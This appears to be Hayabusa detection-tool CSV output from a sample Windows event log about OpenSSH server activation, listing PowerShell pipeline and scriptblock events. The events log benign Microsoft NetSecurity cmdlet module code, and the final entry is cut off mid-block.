+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.083 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.083 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.083 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.084 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.084 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.085 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.085 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.091 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.091 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.092 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.092 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.092 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 
$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { 
[object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 